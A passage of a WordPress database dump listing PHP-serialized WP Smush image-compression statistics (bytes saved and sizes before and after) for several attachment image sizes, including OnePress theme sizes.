}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.61999999999999744204615126363933086395263671875;s:5:\"bytes\";i:4219;s:11:\"size_before\";i:12188;s:10:\"size_after\";i:7969;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:9598;s:11:\"size_before\";i:26509;s:10:\"size_after\";i:16911;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.719999999999998863131622783839702606201171875;s:5:\"bytes\";i:18369;s:11:\"size_before\";i:59789;s:10:\"size_after\";i:41420;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:11127;s:11:\"size_before\";i:45571;s:10:\"size_after\";i:34444;s:4:\"time\";d:0.460000000000000019984014443252817727625370025634765625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.86999999999999744204615126363933086395263671875;s:5:\"bytes\";i:8314;s:11:\"size_before\";i:23181;s:10:\"size_after\";i:14867;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.1700000000000017053025658242404460906982421875;s:5:\"bytes\";i:13911;s:11:\"size_before\";i:37422;s:10:\"size_after\";i:23511;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:15633;s:11:\"size_before\";i:43914;s:10:\"size_after\";i:28281;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4357,1827,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.80316950315444302077594329603016376495361328125;s:5:\"bytes\";i:37774;s:11:\"size_before\";i:239028;s:10:\"size_after\";i:201254;s:4:\"time\";d:1.3000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.489999999999998436805981327779591083526611328125;s:5:\"bytes\";i:2416;s:11:\"size_before\";i:9867;s:10:\"size_after\";i:7451;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:6778;s:11:\"size_before\";i:22766;s:10:\"size_after\";i:15988;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:7457;s:11:\"size_before\";i:58342;s:10:\"size_after\";i:50885;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:56715;s:10:\"size_after\";i:56715;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.559999999999998721023075631819665431976318359375;s:5:\"bytes\";i:5059;s:11:\"size_before\";i:19049;s:10:\"size_after\";i:13990;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:8589;s:11:\"size_before\";i:31645;s:10:\"size_after\";i:23056;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:7475;s:11:\"size_before\";i:40644;s:10:\"size_after\";i:33169;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4358,1826,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.4479406439810560414116480387747287750244140625;s:5:\"bytes\";i:51454;s:11:\"size_before\";i:264573;s:10:\"size_after\";i:213119;s:4:\"time\";d:1.399999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:2428;s:11:\"size_before\";i:9189;s:10:\"size_after\";i:6761;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:7722;s:11:\"size_before\";i:25256;s:10:\"size_after\";i:17534;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.530000000000001136868377216160297393798828125;s:5:\"bytes\";i:10196;s:11:\"size_before\";i:61687;s:10:\"size_after\";i:51491;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.29999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:4767;s:11:\"size_before\";i:65262;s:10:\"size_after\";i:60495;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.620000000000000994759830064140260219573974609375;s:5:\"bytes\";i:6248;s:11:\"size_before\";i:21832;s:10:\"size_after\";i:15584;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:10867;s:11:\"size_before\";i:36087;s:10:\"size_after\";i:25220;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.379999999999999005240169935859739780426025390625;s:5:\"bytes\";i:9226;s:11:\"size_before\";i:45260;s:10:\"size_after\";i:36034;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4359,1825,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:31.28338509316770199575330480001866817474365234375;s:5:\"bytes\";i:40293;s:11:\"size_before\";i:128800;s:10:\"size_after\";i:88507;s:4:\"time\";d:1.3400000000000000799360577730112709105014801025390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.809999999999998721023075631819665431976318359375;s:5:\"bytes\";i:2289;s:11:\"size_before\";i:7429;s:10:\"size_after\";i:5140;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.9500000000000028421709430404007434844970703125;s:5:\"bytes\";i:6585;s:11:\"size_before\";i:18839;s:10:\"size_after\";i:12254;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:9041;s:11:\"size_before\";i:30818;s:10:\"size_after\";i:21777;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:1756;s:11:\"size_before\";i:15689;s:10:\"size_after\";i:13933;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.52000000000000312638803734444081783294677734375;s:5:\"bytes\";i:5352;s:11:\"size_before\";i:15504;s:10:\"size_after\";i:10152;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.340000000000003410605131648480892181396484375;s:5:\"bytes\";i:8455;s:11:\"size_before\";i:20453;s:10:\"size_after\";i:11998;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:6815;s:11:\"size_before\";i:20068;s:10:\"size_after\";i:13253;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}}}'),(4360,1823,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:31.234009725992617489964686683379113674163818359375;s:5:\"bytes\";i:63971;s:11:\"size_before\";i:204812;s:10:\"size_after\";i:140841;s:4:\"time\";d:1.410000000000000142108547152020037174224853515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:3655;s:11:\"size_before\";i:10094;s:10:\"size_after\";i:6439;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.02000000000000312638803734444081783294677734375;s:5:\"bytes\";i:9529;s:11:\"size_before\";i:25742;s:10:\"size_after\";i:16213;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.739999999999998436805981327779591083526611328125;s:5:\"bytes\";i:11380;s:11:\"size_before\";i:45993;s:10:\"size_after\";i:34613;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.8299999999999982946974341757595539093017578125;s:5:\"bytes\";i:5200;s:11:\"size_before\";i:30893;s:10:\"size_after\";i:25693;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.74000000000000198951966012828052043914794921875;s:5:\"bytes\";i:8033;s:11:\"size_before\";i:22477;s:10:\"size_after\";i:14444;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:13797;s:11:\"size_before\";i:33301;s:10:\"size_after\";i:19504;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.090000000000003410605131648480892181396484375;s:5:\"bytes\";i:12377;s:11:\"size_before\";i:36312;s:10:\"size_after\";i:23935;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4361,1822,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:25.5251203997678857149367104284465312957763671875;s:5:\"bytes\";i:69060;s:11:\"size_before\";i:270557;s:10:\"size_after\";i:201497;s:4:\"time\";d:1.37000000000000010658141036401502788066864013671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:3483;s:11:\"size_before\";i:11166;s:10:\"size_after\";i:7683;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:8795;s:11:\"size_before\";i:25341;s:10:\"size_after\";i:16546;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:14680;s:11:\"size_before\";i:62188;s:10:\"size_after\";i:47508;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:11035;s:11:\"size_before\";i:69580;s:10:\"size_after\";i:58545;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.99000000000000198951966012828052043914794921875;s:5:\"bytes\";i:7126;s:11:\"size_before\";i:21601;s:10:\"size_after\";i:14475;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.99000000000000198951966012828052043914794921875;s:5:\"bytes\";i:12155;s:11:\"size_before\";i:35759;s:10:\"size_after\";i:23604;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.239999999999998436805981327779591083526611328125;s:5:\"bytes\";i:11786;s:11:\"size_before\";i:44922;s:10:\"size_after\";i:33136;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}}}'),(4362,1821,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:33.64509341176744072754445369355380535125732421875;s:5:\"bytes\";i:57881;s:11:\"size_before\";i:172034;s:10:\"size_after\";i:114153;s:4:\"time\";d:1.5000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3012;s:11:\"size_before\";i:9582;s:10:\"size_after\";i:6570;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.24000000000000198951966012828052043914794921875;s:5:\"bytes\";i:8729;s:11:\"size_before\";i:23439;s:10:\"size_after\";i:14710;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:11444;s:11:\"size_before\";i:39151;s:10:\"size_after\";i:27707;s:4:\"time\";d:0.35999999999999998667732370449812151491641998291015625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:4281;s:11:\"size_before\";i:24048;s:10:\"size_after\";i:19767;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.280000000000001136868377216160297393798828125;s:5:\"bytes\";i:7191;s:11:\"size_before\";i:19820;s:10:\"size_after\";i:12629;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:45.469999999999998863131622783839702606201171875;s:5:\"bytes\";i:12425;s:11:\"size_before\";i:27328;s:10:\"size_after\";i:14903;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:10799;s:11:\"size_before\";i:28666;s:10:\"size_after\";i:17867;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}}}'),(4363,1819,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.835565427582150022089990670792758464813232421875;s:5:\"bytes\";i:61360;s:11:\"size_before\";i:198991;s:10:\"size_after\";i:137631;s:4:\"time\";d:1.609999999999999875655021241982467472553253173828125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:3128;s:11:\"size_before\";i:10068;s:10:\"size_after\";i:6940;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.24000000000000198951966012828052043914794921875;s:5:\"bytes\";i:8974;s:11:\"size_before\";i:24761;s:10:\"size_after\";i:15787;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.120000000000000994759830064140260219573974609375;s:5:\"bytes\";i:11382;s:11:\"size_before\";i:45311;s:10:\"size_after\";i:33929;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:7368;s:11:\"size_before\";i:32984;s:10:\"size_after\";i:25616;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35;s:5:\"bytes\";i:7438;s:11:\"size_before\";i:21250;s:10:\"size_after\";i:13812;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:39.77000000000000312638803734444081783294677734375;s:5:\"bytes\";i:12228;s:11:\"size_before\";i:30744;s:10:\"size_after\";i:18516;s:4:\"time\";d:0.25;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.00999999999999801048033987171947956085205078125;s:5:\"bytes\";i:10842;s:11:\"size_before\";i:33873;s:10:\"size_after\";i:23031;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4364,1818,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.324396641491031090254182345233857631683349609375;s:5:\"bytes\";i:52574;s:11:\"size_before\";i:303468;s:10:\"size_after\";i:250894;s:4:\"time\";d:1.3299999999999998490096686509787105023860931396484375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.940000000000001278976924368180334568023681640625;s:5:\"bytes\";i:2690;s:11:\"size_before\";i:8985;s:10:\"size_after\";i:6295;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:7902;s:11:\"size_before\";i:25197;s:10:\"size_after\";i:17295;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:11887;s:11:\"size_before\";i:71943;s:10:\"size_after\";i:60056;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:3517;s:11:\"size_before\";i:86959;s:10:\"size_after\";i:83442;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:6442;s:11:\"size_before\";i:21639;s:10:\"size_after\";i:15197;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:10410;s:11:\"size_before\";i:37376;s:10:\"size_after\";i:26966;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:9726;s:11:\"size_before\";i:51369;s:10:\"size_after\";i:41643;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4365,1817,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.016168544830965213277007563874576590023934841156005859375;s:5:\"bytes\";i:132;s:11:\"size_before\";i:816400;s:10:\"size_after\";i:816268;s:4:\"time\";d:1.850000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:18829;s:10:\"size_after\";i:18829;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.320000000000000006661338147750939242541790008544921875;s:5:\"bytes\";i:132;s:11:\"size_before\";i:41358;s:10:\"size_after\";i:41226;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:185990;s:10:\"size_after\";i:185990;s:4:\"time\";d:0.409999999999999975575093458246556110680103302001953125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:316709;s:10:\"size_after\";i:316709;s:4:\"time\";d:0.67000000000000003996802888650563545525074005126953125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:37368;s:10:\"size_after\";i:37368;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:83574;s:10:\"size_after\";i:83574;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:132572;s:10:\"size_after\";i:132572;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4366,1816,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.412339830836668141955669852904975414276123046875;s:5:\"bytes\";i:41714;s:11:\"size_before\";i:178171;s:10:\"size_after\";i:136457;s:4:\"time\";d:1.3800000000000001154631945610162802040576934814453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.690000000000001278976924368180334568023681640625;s:5:\"bytes\";i:2233;s:11:\"size_before\";i:7783;s:10:\"size_after\";i:5550;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.31000000000000227373675443232059478759765625;s:5:\"bytes\";i:6664;s:11:\"size_before\";i:19422;s:10:\"size_after\";i:12758;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:9425;s:11:\"size_before\";i:41329;s:10:\"size_after\";i:31904;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:3352;s:11:\"size_before\";i:40744;s:10:\"size_after\";i:37392;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.8299999999999982946974341757595539093017578125;s:5:\"bytes\";i:5213;s:11:\"size_before\";i:15881;s:10:\"size_after\";i:10668;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:8026;s:11:\"size_before\";i:24170;s:10:\"size_after\";i:16144;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.5799999999999982946974341757595539093017578125;s:5:\"bytes\";i:6801;s:11:\"size_before\";i:28842;s:10:\"size_after\";i:22041;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(4367,1815,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:34.76001496777185906239537871442735195159912109375;s:5:\"bytes\";i:65954;s:11:\"size_before\";i:189741;s:10:\"size_after\";i:123787;s:4:\"time\";d:3.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:3376;s:11:\"size_before\";i:9606;s:10:\"size_after\";i:6230;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:9135;s:11:\"size_before\";i:23550;s:10:\"size_after\";i:14415;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:13069;s:11:\"size_before\";i:43296;s:10:\"size_after\";i:30227;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.10000000000000142108547152020037174224853515625;s:5:\"bytes\";i:6886;s:11:\"size_before\";i:29807;s:10:\"size_after\";i:22921;s:4:\"time\";d:2.140000000000000124344978758017532527446746826171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:7678;s:11:\"size_before\";i:20224;s:10:\"size_after\";i:12546;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:43.780000000000001136868377216160297393798828125;s:5:\"bytes\";i:13098;s:11:\"size_before\";i:29917;s:10:\"size_after\";i:16819;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.13000000000000255795384873636066913604736328125;s:5:\"bytes\";i:12712;s:11:\"size_before\";i:33341;s:10:\"size_after\";i:20629;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}}}'),(4368,1814,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.37061758744474815330249839462339878082275390625;s:5:\"bytes\";i:37310;s:11:\"size_before\";i:122849;s:10:\"size_after\";i:85539;s:4:\"time\";d:1.180000000000000159872115546022541821002960205078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.27000000000000312638803734444081783294677734375;s:5:\"bytes\";i:2336;s:11:\"size_before\";i:6817;s:10:\"size_after\";i:4481;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.75;s:5:\"bytes\";i:6169;s:11:\"size_before\";i:16788;s:10:\"size_after\";i:10619;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:7497;s:11:\"size_before\";i:28624;s:10:\"size_after\";i:21127;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:3302;s:11:\"size_before\";i:18622;s:10:\"size_after\";i:15320;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.22999999999999687361196265555918216705322265625;s:5:\"bytes\";i:4877;s:11:\"size_before\";i:13462;s:10:\"size_after\";i:8585;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:14:\"onepress-small\";O:8:\